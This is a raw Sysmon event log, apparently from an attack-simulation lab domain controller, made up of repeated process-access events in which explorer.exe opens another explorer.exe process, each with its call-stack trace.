16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 